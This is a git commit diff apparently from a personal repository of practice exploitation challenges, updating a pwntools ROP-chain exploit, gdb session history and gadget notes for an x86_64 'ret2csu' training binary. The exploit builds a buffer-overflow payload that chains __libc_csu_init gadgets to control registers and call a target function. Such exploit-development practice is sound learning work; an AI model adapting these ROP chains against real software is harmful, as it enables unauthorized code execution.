modified: x86_64/ret2csu/exploit.py

modified: x86_64/ret2csu/gadgets
2020-12-20 17:29:46 -06:00 · 2020-12-20 17:29:46 -06:00 · 5660ef3166
commit 5660ef3166
parent 11cbb37694
3 changed files with 72 additions and 11 deletions
--- a/x86_64/ret2csu/.gdb_history
+++ b/x86_64/ret2csu/.gdb_history
@ -54,3 +54,52 @@ stepi
 info reg rdi
 continue
 quit
+starti
+x 0x00000000004006a3
+x 0x00000000004006a3
+x __libc_csu_init
+x __libc_csu_init+99
+quit
+break *0x40069a
+run
+continue
+context
+stepi
+info reg
+info reg rbx
+info reg rbp
+info reg r12
+info reg r13
+info reg r14
+continue
+stepi
+info reg rbp
+info reg rbx
+stepi
+info reg rdx
+stepi
+continue
+continue
+stepi
+info reg r12
+info reg rbx
+stepi
+quit
+continue
+quit
+continue
+continue
+auit
+quit
+break *0x40069a
+continue
+stepi
+finro reg rbx
+info reg rbx
+stepi
+info reg r12
+x $r12
+x $r12 + $rbx
+x $r12 + ($rbx * 8)
+x $r12 + (($rbx - 1) * 8)
+quit
--- a/x86_64/ret2csu/exploit.py
+++ b/x86_64/ret2csu/exploit.py
@ -1,6 +1,8 @@
 #!/usr/bin/env python3
 from pwn import *

+context.terminal = ['kitty', 'bash', '-c']
+
 prog = gdb.debug('./ret2csu', gdbscript='b *0x40069a')
 payload = b''
 for c in range(40):
@ -8,18 +10,26 @@ for c in range(40):


 payload += p64(0x40069a)            # __libc_csu_init()
-payload += p64(0)
-payload += p64(0)
-payload += p64(0x601020)
+
+payload += p64(19)
+payload += p64(1)
+payload += p64(0x601018)
 payload += p64(0xdeadbeefdeadbeef)
 payload += p64(0xcafebabecafebabe)
 payload += p64(0xd00df00dd00df00d)

+
 payload += p64(0x400680)

+payload += p64(1)
+payload += p64(2)
+
+payload += p64(0x00000000004006a3)
+payload += p64(0xdeadbeefdeadbeef)
+
+payload += p64(0x0000000000400510)
+

-#payload += p64(0x00000000004006a3)
-#payload += p64(0xdeadbeefdeadbeef)

 payload += b"\n"

--- a/x86_64/ret2csu/gadgets
+++ b/x86_64/ret2csu/gadgets
@ -71,16 +71,18 @@ Disassembly of section .fini:
 calling x86: 

 controlling rdx: 
-1: 0x00000000004006a3
-  rdi : 0xdeadbeefdeadbeef 

 2: 0x40069a
  rbx: 0                          <--
-  rbp: whatever
-  r12: 0x601020                   <-- next location. lets try to make it ret2win
-  r13: 0xdeadbeef                 <-- would be nice if we could use a 64 bit value
+  rbp: 1
+  r12: 0xffffffff                 <-- next location. lets try to make it 
+  r13: whatever I guess           <-- would be nice if we could use a 64 bit value
  r14: 0xcafebabecafebabe                 
  r15: 0xd00df00dd00df00d         <--

+we can set r12 to [function@plt], and rbx to desired offset.

-3: 0x0000000000400510 (ret2win) 
+0x00000000004004e0 : call rax
+
+target address: 0x00000000004006a3 
+0000000000400510 ret2csu